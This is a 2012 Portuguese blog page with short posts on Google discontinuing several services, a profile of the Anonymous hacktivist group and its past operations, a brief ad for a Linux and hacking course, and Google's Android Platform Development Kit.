O Google anunciou que nos próximos meses, cinco serviços serão desabilitados. Não é a primeira vez que a companhia comunica uma “faxina” de seus produtos, esta é a sexta vez que acontece desde que o co-fundador, Larry Page, ocupou o cargo de CEO.
Um dos serviços que será desabilitado será o Google Vídeo, serviço criado antes mesmo do YouTube, ele não recebe mais atualizações desde o ano de 2009. Os vídeos do serviço serão transferidos para o YouTube. Assim, os usuário terão até o dia 20 de agosto para migrar, apagar ou mesmo baixar o seu conteúdo, a partir da data, todos serão passados automaticamente para o YouTube.
O iGoogle será outro serviço que deixará de existir. "Com aplicativos modernos que funcionam em plataformas como Android e Chrome, a necessidade do iGoogle corroeu ao longo do tempo, por isso vamos descontinuá-lo. Os usuários terão 16 meses para ajustar ou exportar seus dados", afirmou o Google em post no blog oficial.
No dia 31 de julho o Google Mini, que foi lançado em 2005, também será extinto. O Google Talk Chatback, que permitia que os sites interagissem com os visitantes, também será desabilitado em breve. Outro serviço que também irá de existir é o aplicativo de pesquisa para o sistema operacional móvel Symbian, da Nokia.
"O fechamento de produtos sempre envolve escolhas difíceis, mas nós pensamos muito sobre cada decisão e suas implicações para os nossos usuários. A racionalização dos nossos serviços permite que o nosso foco na criação de uma tecnologia bonita que vai melhorar a vida das pessoas", afirma a companhia no mesmo post.

terça-feira, 3 de julho de 2012

Grupo Anonymous

Nós somos uma idéia. Uma idéia que não pode ser contida, perseguida nem aprisionada. Somos uma idéia que surgiu em 2004 e sempre seguiu uma linguagem de memética e muitas sátiras. Hoje, Anonymous é uma idéia de mudança, um desejo de renovação. Somos uma idéia de um mundo onde a corrupcão não exista, onde a liberdade de expressão não seja apenas uma promessa, e onde as pessoas não tenham que morrer lutando por seus direitos. Não somos um grupo. Somos uma idéia de revolução. Acreditamos que cada geração encontra sua forma de lutar contra as injustiças que encontra. Temos em mãos pela primeira vez o poder de produzir, distribuir e trocar informações. Uma oportunidade nunca vista antes na história para colaboração e construção de um mundo onde a esperança, a dignidade e a justiça sejam princípios a serem respeitados.

Nós não somos uma organizacão e não temos líderes. Oficialmente nós não existimos e não queremos existir oficialmente. Nós não seguimos partidos políticos, orientacões religiosas, interesses econômicos e nem ideologias de quaisquer espécies. Anonymous não pede dinheiro nem qualquer favor ou benefício a ninguém. Mais uma vez: Anonymous não tem líderes. Se alguém lhe disser que representa ou lidera Anonymous, este alguém não conhece a idéia Anonymous, porque nós não podemos ser representados ou liderados, porque isto é o que somos: uma idéia.

O que buscam?

O grupo Anonymous busca principalmente liberdade de expressão e conteúdo online. O grupo, geralmente, usa o Twitter para divulgar seus feitos. Muitas vezes postam vídeos explicativos sobre seus ataques (protestos virtuais). Eles não possuem o objetivo de roubar, como também de prejudicar os usuários de internet, mas sim, mostrar a vulnerabilidade do sistema como também expor atos de corrupção, pedofilia, falta de liberdade na internet, entre outros.
Amados por uns e odiados por outros, o grupo Anonymous está espalhado por praticamente todos os cantos do mundo. No Brasil não poderia ser diferente.  Os principais sites que sofreram ataques são do governo como também de grandes companhias, de bancos, entre outros.

Os principais feitos

1 - Prisão de Chris Forcand: No ano de 2007, o jornal do Canadá Toronto Sun divulgou um relatório ao qual afirmava que Chris Forcant, acusado de pedofilia, havia sido monitorado por “cyber-vigilantes”, que monitoravam pessoas que apresentavam interesse sexual por menores de idade na internet. Assim, o grupo relatou à polícia sobre as propostas sexuais de Forcand, e o predador acabou sendo detido.
2 - Operação Darknet - O grupo também colaborou com a polícia na divulgação de nomes que estavam ligados a pedofilia na internet. Após conseguir acesso a um site de pornografia infantil, o grupo Anonymous conseguiu fazer que os usuários baixassem uma suposta atualização de um software que seria capaz de ocultar a identidade, desse modo, os usuários acabavam sendo direcionados a um site controlado pelo grupo ao qual podiam armazenar o IP dos visitantes. O grupo publicou o nome de mais de 1500 pessoas que frequentavam sites de pornografia infantil e ainda convidou o FBI e Interpol para acompanhar as suas ações.
3 - Operação Independência - No dia que era comemorada a independência no México, o grupo Anonymous marcou a data com vários ataques a órgãos do estado.  
4 - Apoio ao WikiLeaks - No mês de dezembro de 2010, o site WikiLeaks, foi pressionado a parar de publicar os telegramas secretos do serviço diplomático dos Estados Unidos. O Anonymous, por sua vez, declarou apoio ao WikiLeaks e lançou ataques DDoS contra Amazon, PayPal, MasterCard, Visa e ao Banco Suíço PostFinance, que era responsáveis por tomar medidas contra o WiliLeaks.
5 - Primavera Árabe, Operação Egito e operação Tunísia - Sites do governo da Tunísia foram alvo do Anonymous em consequência a censura dos documentos da WikiLaeks e da Revolução da Tunísia.
6 - Tango Down Apple! - O grupo invadiu um servidor da Apple e divulgou no Twitter supostas senhas e nomes de administradores. A Apple armazena dados de cartões de créditos de milhares de clientes, para tanto, o grupo não revelou os dados. “A Apple poderia ser um alvo. Mas estamos ocupados”, dizia um tuíte do grupo seguido de um link para as informações coletadas.
7 - Operação Megaupload e Protesto Anti-Sopa - No início de 2012 o site de compartilhamento Megaupload foi tirado do ar pelo Departamento de Justiça dos Estados Unidos e o FBI. O grupo Anonymous não deixou por menos e tirou muitas páginas do ar incluindo aqueles que pertencem ao Departamento de Justiça, ao FBI, Universal Music Group, a RIAA, a MPAA, e a Broadcast Music, Inc

domingo, 1 de julho de 2012

Curso Linux

Curso de Linux, Mikrotik e hacking.
Voltado ao apreendizado, qualquer uso pra fins ilegais é de inteira responsabilidade do usuario.
http://www.pbsys.com.br/?ref=gutherry

Google planeja resolver o problema de atualização do Android

O Google está fazendo uma nova tentativa de resolver o problema de atualização do Android. O plano é dar aos fabricantes de tablets e smartphone a oportunidades de adaptar o seu hardware atual para as versões futuras do Android. O Google espera que isso permita os usuários receberem as atualizações mais rapidamente.
Para conseguir isso, o Google anunciou o PDK – “Platform Development Kit”, liberando o “código-fonte necessário” para permitir que os fabricantes possam “criar” uma versão do Android próxima ao seu hardware. O PDK será disponibilizado de 2 a 3 meses antes de sair oficialmente uma nova versão do Android.
Se o Google conseguir implementar o PDK como anunciado (e as fabricantes se empenharem também), as futuras atualizações pode chegar aos dispositivos mais antigos alguns meses mais cedo. O PDK é a segunda tentativa do Google para corrigir o problema de atualização.
Na conferência Google I/O de 2011, o Google tinha prometido que a HTC, LG, Motorola, Samsung e Sony Ericsson forneceriam atualizações para então versão atual do Android em até 18 meses, no entanto vemos o Samsung Galaxy S, o primeiro Android que conseguiu competir de igual pra igual com o iPhone, rodar o Android 2.2 Froyo, pois a Samsung não liberou nenhuma atualização até hoje para o dispositivo.
Usuários deste gadget (assim como eu) são obrigados a utilizarem ROMs customizadas, como a CyanogenMod, para atualizar seu dispositivo (aproveite e atualize o seu também). A desculpa da empresa é que o “hardware do Galaxy S” não suportaria do Android 4.0.4 ICS (versão estável atual), porém o meu Galaxy S roda o Android 4.0.4 ICS com a ROM da CyanogenMod perfeitamente, sem nenhum problema. E ainda apresenta uma performance incrível, se comparado a outros gadgets como o Galaxy Note.